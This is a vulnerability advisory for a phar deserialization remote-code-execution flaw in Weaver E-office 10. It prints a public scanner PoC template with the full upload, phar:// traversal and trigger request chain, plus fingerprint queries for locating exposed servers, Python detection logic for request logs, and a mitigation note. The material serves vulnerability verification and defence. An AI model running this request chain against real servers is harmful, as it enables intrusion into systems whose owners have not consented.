e-office10-atuh-file-phar-deserialization-rce: Weaver (泛微) E-office 10 atuh-file phar deserialization vulnerability

Date: 2025-09-01 | Affected software: e-office | PoC: public

Vulnerability description

Weaver (泛微) E-office 10 has a flaw in its handling of uploaded PHAR files. An attacker can upload a disguised PHAR file to the server and then trigger PHP's automatic deserialization of the PHAR metadata, which happens whenever a file operation is performed on a phar:// path, to achieve remote code execution.

Fingerprints:
hunter: web.body="eoffice10"&&web.body="eoffice_loading_tip"
fofa: app="泛微-EOffice" && body="eoffice_loading_tip" && body="eoffice10"

PoC code [public]

id: e-office10-atuh-file-phar-deserialization-rce

info:
  name: 泛微E-office 10 atuh-file存在phar反序列化漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    泛微E-office 10 处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。 
    hunter:web.body="eoffice10"&&web.body="eoffice_loading_tip"
    fofa: app="泛微-EOffice" && body="eoffice_loading_tip" && body="eoffice10"
  reference:
    - https://mp.weixin.qq.com/s/RDyadHPXgGa4ABK4M1RMPQ
    - https://mp.weixin.qq.com/s/zFQ1DZZojm3ww1jq0ReVhw
  tags: e-office,phar,rce,deserialization
  created: 2024/12/17

set:
  boundary: randomLowercase(8)
  payload: base64Decode("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")
rules:
  r0:
    request:
      method: POST
      path: /eoffice10/server/public/api/attachment/atuh-file
      headers:
        Content-Type: multipart/form-data; boundary={{boundary}}
      body: "--{{boundary}}\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"register.inc\"\r\nContent-Type: image/jpeg\r\n\r\n{{payload}}\r\n--{{boundary}}--"
    expression: response.status == 200 && response.body.bcontains(b'"attachment_id":')
    output:
      search: '"\"attachment_id\":\"(?P<attachment_id>.+?)\",".bsubmatch(response.body)'
      attachment_id: search["attachment_id"]
  r1:
    request:
      method: POST
      path: /eoffice10/server/public/api/attachment/path/migrate
      body: source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F
    expression: response.status == 200 && response.body.bcontains(b'"status":1')
  r2:
    request:
      method: POST
      path: /eoffice10/server/public/api/empower/import
      body: type=tttt&file={{attachment_id}}
    expression: response.status == 200 && response.body.bcontains(b'9yM86ESyFBXNDwCh6Nbsxy9wrcQrP25P') && response.body.bcontains(b'"code":"no_file"')
expression: r0() && r1() && r2()
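The chain above has three observable stages: a non-image upload to atuh-file, a phar:// stream wrapper with path traversal sent to path/migrate, and a call to empower/import. The following detection logic is an added example (not part of the PoC template or the E-office code base) that classifies request records from a WAF or request-logging proxy and raises an alert per source address; the request records are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote

UPLOAD_PATH = "/eoffice10/server/public/api/attachment/atuh-file"
MIGRATE_PATH = "/eoffice10/server/public/api/attachment/path/migrate"
IMPORT_PATH = "/eoffice10/server/public/api/empower/import"

# Constructed sample request records (not real traffic). Bodies are kept raw so the
# detector has to do its own decoding, exactly as a WAF or logging proxy would.
SAMPLE_REQUESTS = [
    {"src": "198.51.100.7", "path": UPLOAD_PATH,
     "body": 'Content-Disposition: form-data; name="Filedata"; filename="register.inc"'},
    {"src": "198.51.100.7", "path": MIGRATE_PATH,
     "body": "source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F"},
    {"src": "198.51.100.7", "path": IMPORT_PATH, "body": "type=tttt&file=12345"},
    {"src": "203.0.113.9", "path": MIGRATE_PATH,   # benign migrate call, no wrapper
     "body": "source_path=old&desc_path=%2Fattachment%2Freports%2F"},
]

WRAPPER_RE = re.compile(r"\bphar://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
FILENAME_RE = re.compile(r'filename="([^"]*)"', re.IGNORECASE)
IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}

def decode_param_values(body):
    """URL-decode every form value a second time so double-encoded phar:// is still seen."""
    return {k: [unquote(v) for v in vals]
            for k, vals in parse_qs(body, keep_blank_values=True).items()}

def classify(req):
    """Return the set of indicators found in one request record."""
    tags = set()
    if req["path"] == UPLOAD_PATH:
        for name in FILENAME_RE.findall(req["body"]):
            if name.rsplit(".", 1)[-1].lower() not in IMAGE_EXT:
                tags.add("non_image_upload")   # filename extension contradicts image upload
    for values in decode_param_values(req["body"]).values():
        for value in values:
            if WRAPPER_RE.search(value):
                tags.add("phar_wrapper")
            if TRAVERSAL_RE.search(value):
                tags.add("path_traversal")
    if req["path"] == IMPORT_PATH:
        tags.add("empower_import")
    return tags

def correlate(requests):
    """Group indicators per source; alert only when phar:// reaches the migrate endpoint."""
    per_src = {}
    for req in requests:
        tags = classify(req)
        if "phar_wrapper" in tags and req["path"] == MIGRATE_PATH:
            tags.add("phar_migrate")
        per_src.setdefault(req["src"], set()).update(tags)
    return {src: sorted(t) for src, t in per_src.items() if "phar_migrate" in t}
```

Blocking the phar:// wrapper in `desc_path` (or disabling the wrapper with `stream_wrapper_unregister('phar')` where the application does not need it) removes the deserialization trigger regardless of what was uploaded.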
